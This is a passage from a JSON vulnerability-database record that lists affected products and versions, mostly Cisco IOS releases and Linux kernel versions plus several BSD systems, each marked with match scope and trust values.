            "vendor": "cisco",
            "version": "12.0\\(7\\)xe2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)xz7"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3jk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)mr"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.0"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12.05\\)s"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xm"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16.06\\)s"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)s8"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.31"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)t14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)sc3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zo"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(3d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)t"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.1.132"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(9\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xw"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.27"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)ewa3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3aa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yd2"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.4.3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.47"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8b\\)e18"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7a\\)ey3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(8\\)p"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xb"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)xn"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(27\\)sv1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yi1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ya9"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2mc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)s8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0\\(17\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5\\)b1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)t1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(18\\)s7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)yt1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3j"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(3\\)t2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)s3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.33"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)sy03"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3jx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yn"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.39"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(21b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)yq1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)st6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)mx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sw"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)t5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(28c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)xb2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6a\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2.6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.22"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(8.2\\)sa6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(22\\)ea6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)st1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(30\\)s4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(11\\)st4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(28d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(3\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0wt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)seb"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yw"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.7"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)dc2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sec1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)t9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)eu1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5a\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17d\\)sxb"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)se"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(16.1\\)b"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.29"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)mr1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xf"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.22"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)t2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(24\\)s6"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)s14"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.42"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(18\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)t9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12.22"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)so4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)t16"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yb4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.21"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(15b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xm7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0w5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.18"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3jeb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)t3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.56"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(11\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ay"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3a\\)e8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xq"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(4\\)xm1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5.2\\)xu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)e2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(15\\)bc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(14\\)w5\\(20\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1x\\(l\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(15\\)s7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)eu2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)ew2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)sl"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.24"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(10\\)s7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(14\\)st3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sxe"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.42"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xn"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)t2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15.5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(21a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5f\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8a\\)ex"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3ma"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sw3a"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)st8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)zb7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(21\\)st6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(24\\)s5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xq"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(12\\)s3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(05\\)wc8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xw"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.18"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xg2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(8.0.2\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2se"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.13.4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)xi7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ex"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.19.3"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12i\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xb11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(22\\)s"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.35"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(16\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1cx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)eo"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(4\\)xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3a\\)t4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)e8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(6.8\\)t1a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yg1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yk1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19\\)ec"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20\\)sp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)e3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)yx1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(9a\\)bc2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20\\)sl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17\\)a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
